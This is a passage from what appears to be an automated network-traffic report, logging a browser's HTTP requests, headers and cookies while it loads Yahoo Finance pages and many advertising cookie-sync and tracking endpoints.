noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js HTTP/1.1Host: wnsrvbjmeprtfrnfx.ay.deliveryConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirectuser?sid=GET_SID_FROM_ZETA&gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dzeta_global_ssp%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Di%26uid%3DBUYERUID HTTP/1.1Host: ssp.disqus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/default/20181213/Finance_Brand_Filler__300x250_Look_1.jpg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f665d8114e8c2c904180d9ba9ec2b7b1.safeframe.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?nid=114&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /usync/prbds2s?gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dgumgum%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D HTTP/1.1Host: rtb.gumgum.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Typography.CaSb88v6.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /cv/apiv2/default/20181213/Finance_Brand_Filler__970x250_Look_1.jpg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f665d8114e8c2c904180d9ba9ec2b7b1.safeframe.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/dcm?pid=4bd6ceca-c698-4782-a536-f380f757484c&id=176682A8-E121-44A7-818D-4FE53D542BB2&redir=true&gdpr=0&gdpr_consent= HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getuid?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=$UID&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=RGs3E-BNKWUM9-E0Yk6nUq1ov1cuPZyw51dkSNWtWVZE2TtKD2t0w8nihOlT-IcCBZ6eN6XF0B7WUcdB-B2J9u_noxx1687OtyCpmDgTn8Y.; receive-cookie-deprecation=1; uuid2=7992184014990425658
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Image.BjjiB67D.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /sg/taboola-ifs/1/um/?uils=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380!-%23%40718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383 HTTP/1.1Host: trc.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=d10c4730-5cb3-81ed-9e19-fb377ae6d6a7&dcc=t HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A6NeCuUwEkCZkxeBPKtFe6Q|t
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537148856&val=ZvreFAAGJF7U4wAF&_test=ZvreFAAGJF7U4wAF HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/FeatureBarNeo.CGHKwr-8.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /cr?key=pubmatic&gdpr=0&gdpr_consent= HTTP/1.1Host: cr.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=176682A8-E121-44A7-818D-4FE53D542BB2 HTTP/1.1Host: mwzeom.zeotap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Layout.Cie9yXEc.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537072971&val=07c89b85-4c1c-424d-8df0-0123ed6cebb6&ttd_puid=89da3b4d-4019-3a17-5e17-79a012d51d47&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537072991&val=CAESEBekM66nmsCe4_HEDSbE50c&google_cver=1 HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK
Source: global trafficHTTP traffic detected: GET /xuid?mid=3658&xuid=07c89b85-4c1c-424d-8df0-0123ed6cebb6&dongle=0cfd&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /xuid?mid=5989&xuid=CAESEOe2R8T-8keCMBRyELE2mow&dongle=c627&gdpr=0&gdpr_consent=&google_cver=1 HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /dcm?pid=50cd21b7-d8d7-4615-9fb9-a2be831f8488&id=&gdpr=0&us_privacy=1YNN HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A6NeCuUwEkCZkxeBPKtFe6Q|t
Source: global trafficHTTP traffic detected: GET /js/ld/publishertag.prebid.144.js HTTP/1.1Host: static.criteo.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=56135341&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN HTTP/1.1Host: image6.pubmatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=1; pi=133799:2; DPSync4=1728864000%3A245_241_227_226; SyncRTB4=1728259200%3A223%7C1728864000%3A220_13_251_54_71_3_21_201_56
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=triplelift&gdpr=0&gdpr_consent=&us_privacy=&google_hm=MzgxMTIzOTY2NDcxNTM3NTc3MDQzNQ%3D%3D HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=tl&gdpr=0&gdpr_consent=&us_privacy=&google_hm=MzgxMTIzOTY2NDcxNTM3NTc3MDQzNQ%3D%3D HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pcs/view?xai=AKAOjssKWS3DNbgOuYnBF790YV34jJmo3x6yrl4NNN4SvpRNyshrBG7k495L3N_gXtL-35wa2UMasY4W9HirdqQHF5Frp_v19RMHi_LmvD12M7M6IEuuDfJH6lUZLs-xNjkWTUIKmLBel5HgRDwAvry36LNMCo1S-d_MtcVkgRZeOpojWu_0LTC32AYcvBlkjMfWU2-8cYUpSqq3HEf1hzNWa3dOlDGbc094SUhwnvDziipJqANIM0hJGiXCDefHm6Fu0cdQI_nWhA7UBHP3es7ttBQp3IDHDgmnglwjbJZqvTu2MeGJ5D1PdVvl0ihqbH1mky3GZeod52iM4oncO5sMvdGaA_sYfe9q3XL0KPrRGdcSJjhU9yWdhCNHoWC-Wk7EHgEmN4wlWaoSYDGzLbcLSc7OYX89AgtOaD8kHnkdqRpj4KOJ9H1WD_KgHQNo-cRpMMsc0q2gRrwtz7F2&sai=AMfl-YTFi9HZ31skp4cVRBVqJo6kbZ-NyjH5hkaG8EhnAtrd_3iQhenX07JdIFR37Uny7L5Sv13MqJ-WBbzttN3oQuTtQnSQMAw8oQ1UcRKnw1-Kaq2yERDJcffoQqQIgCd8lnz0VLlzvkaYi4iH1YPZZg&sig=Cg0ArKJSzOGQQCd4khE1EAE&uach_m=%5BUACH%5D&urlfix=1&adurl= HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 